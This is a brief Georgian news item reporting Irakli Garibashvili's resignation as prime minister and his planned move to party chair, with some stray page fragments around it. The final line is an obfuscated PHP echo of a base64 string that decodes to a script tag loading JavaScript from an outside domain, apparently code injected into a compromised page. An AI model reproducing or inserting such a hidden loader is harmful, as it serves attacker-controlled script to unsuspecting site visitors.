celsiusi
ავერსი საქკაბელი

 ირაკლი ღარიბაშვილმა პრემიერ-მინისტრის თანამდებობა დატოვა.

ამის შესახებ ღარიბაშვილმა დღევანდელ ბრიფინგზე განაცხადა.

„მინდა, საზოგადოებას ვაცნობო გადაწყვეტილების შესახებ, რომელზეც ვიმსჯელეთ გუნდთან ერთად, დღეს მე ვტოვებ პრემიერ-მინისტრის თანამდებობას“, – აღნიშნა ღარიბაშვილმა.

ღარიბაშვილის თქმით, პოლიტსაბჭოსგან მიიღო შეთავაზება, დაიკავოს პარტიის თავმჯდომარის თანამდებობა და ამასთან დაკავშირებით ყრილობა გაიმართება პირველ თებერვალს.

შეგახსენებთ, ირაკლი ღარიბაშვილი პრემიერის თანამდებობას პირველად 2013-2015 წლებში იკავებდა. 2015 წლის 30 დეკემბერს მან თანამდებობა დატოვა და მთავრობაში 2019 წელს თავდაცვის მინისტრის რანგში დაბრუნდა. ორი წლის შემდეგ კი, 2021 წლის თებერვალში საქართველოს პარლამენტმა პრემიერ-მინისტრად დაამტკიცა.

333
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");